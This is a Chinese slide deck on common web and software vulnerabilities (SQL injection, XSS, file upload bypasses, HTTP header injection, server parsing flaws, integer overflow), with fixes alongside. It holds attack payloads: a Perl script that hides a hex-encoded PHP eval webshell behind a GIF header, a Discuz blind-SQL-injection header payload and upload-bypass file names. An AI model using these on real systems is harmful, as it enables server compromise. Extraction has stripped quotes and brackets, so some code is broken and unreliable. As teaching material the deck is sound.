常見安全漏洞類型與分析PPT課件

1、2021/7/241常見漏洞類型與分析信息安全部吳翰清2007-06-52021/7/242提綱 概述 頭號(hào)大敵：SQL Injection 被忽視的巨大威脅：跨站腳本漏洞 文件上傳，一擊必殺 權(quán)限問題 盲區(qū)：來自HTTP頭的安全隱患 與Web Server結(jié)合產(chǎn)生的漏洞 什么樣的漏洞，才叫漏洞？ 十年的來的頑癥-緩沖區(qū)溢出 攻與防-操作系統(tǒng)針對(duì)緩沖區(qū)溢出的保護(hù) 漏洞挖掘方法簡介2021/7/243概述Web安全是互聯(lián)網(wǎng)安全的重中之重Web安全的特點(diǎn) 與實(shí)現(xiàn)的語言有密切的關(guān)系（ASP/PHP/JSP） 與數(shù)據(jù)庫有緊密聯(lián)系2021/7/244頭號(hào)大敵:SQL Injection定義： 由于程序中

2、對(duì)用戶輸入檢查不嚴(yán)格，用戶可以提交一段數(shù)據(jù)庫查詢代碼，根據(jù)程序返回的結(jié)果，獲得某些他想得知的數(shù)據(jù)，這就是所謂的SQL Injection，即SQL注入。SQL Injection的本質(zhì): 對(duì)于輸入檢查不充分，導(dǎo)致SQL語句將用戶提交的非法數(shù)據(jù)當(dāng)作語句的一部分來執(zhí)行。2021/7/245示例:String user = request.getParameter(username);String pass = request.getParameter(password);String query = SELECT id FROM users WHERE username=+user+ AND pa

3、ssword=+pass;Statement stmt = con.createStatement(query);ResultSet rs = con.executeQuery(query);if (rs.next()/ 登錄成功int id = rs.getInt(1);.else/ 登錄失敗.2021/7/246正確的編程方法：String user = request.getParameter(username);String pass = request.getParameter(password);String query = SELECT id FROM users WHERE u

4、sername=? AND password=?;PreparedStatement stmt = con.prepareStatement(query);stmt.setString(1, user);stmt.setString(2, pass);ResultSet rs = stmt.executeQuery();2021/7/247被忽視的巨大威脅：跨站腳本漏洞XSS(Cross Site Script)XST(HTML Hijacking)2021/7/248瀏覽器客戶端的攻擊常常與XSS相結(jié)合 2021/7/249國際站XST竊取任意用戶密碼在發(fā)布產(chǎn)品頁面構(gòu)造惡意html語句202

5、1/7/2410發(fā)布后，如果某個(gè)用戶查看了此產(chǎn)品，則會(huì)自動(dòng)修改該用戶的注冊(cè)郵箱，或者其他member信息！2021/7/2411Image Upload XSS an example of something you might test for:So you upload this file:/image-xss/onerror=alert(XSS)a=.jpgThis ends up making the page look like: 2021/7/2412解決方案輸出時(shí)使用htmlencode 轉(zhuǎn)義字符，使得成為純文本輸出輸入處做filter,過濾可

6、執(zhí)行的html代碼2021/7/2413文件上傳，一擊必殺文件上傳漏洞： 對(duì)可上傳的文件類型控制不嚴(yán)格，導(dǎo)致可以上傳可執(zhí)行的腳本，從而導(dǎo)致服務(wù)器被控制。2021/7/2414FCKEditor文件上傳漏洞FCKEditor是一款有多個(gè)語言版本的(asp,cgi,aspx,php,cfm,.)的在線編輯的class，很多web系統(tǒng)都使用了這個(gè)class(包括taobao、中文站等許多地方)。 2021/7/2415editorfilemanagerbrowserdefaultconnectorsphpconfig.php行35-36：$ConfigAllowedExtensionsFile =

7、array() ; /允許的上穿類型$ConfigDeniedExtensionsFile = array(php,php3,php5,phtml,asp,aspx,ascx,jsp,cfm,cfc,pl,bat,exe,dll,reg,cgi) ;/禁止上傳的類型2021/7/2416editorfilemanagerbrowserdefaultconnectorsphpcommands.phpfunction FileUpload( $resourceType, $currentFolder ) . $sExtension = substr( $sFileName, ( strrpos($

8、sFileName, .) + 1 ) ) ; $sExtension = strtolower( $sExtension ) ; /得到文件的后綴（以.為標(biāo)志取最后1個(gè)） global $Config ; $arAllowed = $ConfigAllowedExtensions$resourceType ; $arDenied = $ConfigDeniedExtensions$resourceType ; if ( ( count($arAllowed) = 0 | in_array( $sExtension, $arAllowed ) ) & ( count($arDenied

9、) = 0 | !in_array( $sExtension, $arDenied ) ) ) /判斷合法后綴 $iCounter = 0 ; while ( true ) $sFilePath = $sServerDir . $sFileName ; . move_uploaded_file( $oFiletmp_name, $sFilePath ) ;/上傳 注意它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而沒有使用$sExtension為后綴/導(dǎo)致在win下在上傳文件后面加個(gè).來突破未測試3 .2021/7/2417BlackList

10、or WhiteList ?如果我們把AllowedExtensions/DeniedExtensions的設(shè)置反一下： $ConfigAllowedExtensionsFile = array(rar,zip) ; /允許的上穿類型$ConfigDeniedExtensionsFile = array() ;/禁止上傳的類型把設(shè)置DeniedExtensions改為設(shè)置AllowedExtensions，就不會(huì)出現(xiàn)上面的漏洞了，不過這樣在某些情況下，照樣可以突破，問題還是出在這里：move_uploaded_file( $oFiletmp_name, $sFilePath ) ;/上傳 注意

11、它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而沒有使用$sExtension為后綴在apache下，因?yàn)閍pache文件名解析缺陷漏洞3而出現(xiàn)漏洞2021/7/2418F文件上傳漏洞2021/7/2419Getimagesize() bypass先看看gif文件頭：00000000h: 47 49 46 38 39 61 AB 02 E5 03 B3 00 00 00 80 00 ; GIF89a?. G I F 8 9 a $size0 $size1$size0 x$size1 = AB 02683 x E5 039972021/7/242

12、0 構(gòu)造如下perl #!/usr/bin/perl#The Script could pass getimagesize()#gif size: 99x98 pixels$gifhead=x47x49x46x38x39x61. #GIF89a x63x00.#99 x62x00;#98$phpcode=x3cx3fx70 x68x70 x20 x40 x65x76x61x6cx28x24x5fx50 x4fx53x54x5bx63x5dx29x3fx3e;#print $gifhead.$phpcode;2021/7/2421文件上傳漏洞的解決辦法使用正確的函數(shù)白名單與黑名單禁止上傳目錄有執(zhí)

13、行腳本的權(quán)限不要在url中顯示上傳文件的相對(duì)路徑2021/7/2422權(quán)限問題Auth-Bypass越權(quán)訪問2021/7/2423Elearning系統(tǒng)不經(jīng)授權(quán)充值問題2021/7/2424其中 userid; password; ROLE; ORGID; SITEID; 的新值為無效構(gòu)造值。2021/7/2425正確的做法檢查每個(gè)操作是否進(jìn)行授權(quán)，授權(quán)給誰2021/7/2426盲區(qū)：來自HTTP頭的安全隱患HTTP頭的注射(Cookie等)2021/7/2427Discuz 4.x/ Sql Injection$http_query = or ascii(substring(.

14、$sql.),.$s_num.,1).$ccheck. /*;.X-Forwarded-For=$http_query2021/7/2428正確的做法不要信任來自http頭中的取的字段2021/7/2429與Web Server結(jié)合產(chǎn)生的漏洞Apache文件名解析漏洞IIS PUT上傳漏洞2021/7/2430暴力破解驗(yàn)證碼也可以被暴力破解2021/7/2431暴力破解帳戶鎖定對(duì)暴力破解嘗試進(jìn)行帳戶鎖定風(fēng)險(xiǎn)：可能會(huì)造成惡意嘗試鎖定帳戶2021/7/2432Apache 文件名解析漏洞Phpshell.php.rar.rar.rar.rar.rar.rar.rar.rar.rarApache只會(huì)

15、解析第一個(gè) “ . ”2021/7/2433IIS PUT上傳漏洞 PUT /alert.txt HTTP/1.1 Host: Content-Length: 69 HTTP/1.1 100 Continue There are some secure problems in you system, please fix it. ZwelL HTTP/1.1 200 OK 2021/7/2434什么樣的漏洞，才叫漏洞？ Web迅雷activex遠(yuǎn)程執(zhí)行漏洞 WEB訊雷組件的名稱：ThunderServer.webThunder.1，可以采用JS代碼ActiveXObject(ThunderSe

16、rver.webThunder.1);來激活訊雷的組件。其中的關(guān)鍵函數(shù)包括：SetBrowserWindowData：新建瀏覽器窗口。SetConfig：設(shè)置WEB訊雷。HideBrowserWindow：隱藏瀏覽器。AddTask：添加下載任務(wù)。SearchTask：搜索任務(wù)，得到任務(wù)ID，文件下載狀態(tài)等詳情。OpenFile：根據(jù)任務(wù)ID，打開文件。 2021/7/2435十年的來的頑癥-緩沖區(qū)溢出棧溢出(控制返回地址 ebp+4)堆溢出(覆蓋堆結(jié)構(gòu)，2次free，覆蓋堆中的指針)整數(shù)溢出(由于整數(shù)的解析欺騙造成的基于堆棧的溢出)2021/7/2436整數(shù)溢出 bool CBlackLis

17、tMessage:MatchMessage(LPCTSTR szMsg, int nLen, CString &sHint) / 刪除 一些 忽略的字符const int nOrgLen = nLen;TCHAR szFixedBuf513;TCHAR *pCharBuf = NULL;if(nOrgLen 512) /* 1 */pCharBuf = new TCHARnOrgLen + 1; /* 2 */elsepCharBuf = szFixedBuf;lstrcpyn(pCharBuf, szMsg, nOrgLen+1); /* 3 */2021/7/2437 在這里當(dāng) nLen由外界傳入，這里是取的消息的文字長度，是可信的，這里姑且不討論是否可以利用，先來看這個(gè)編程的問題。 nLen是一個(gè)int型，當(dāng)nLen的值為0 x80000000 時(shí)，進(jìn)行比較，將被解析為一個(gè)負(fù)數(shù)，從而可以繞過1處的判斷，使得 pCharBuf只分配了513個(gè)字節(jié)大小的內(nèi)存。 而在之后的拷貝lstrcpyn中，會(huì)將szMsg拷貝 0 x800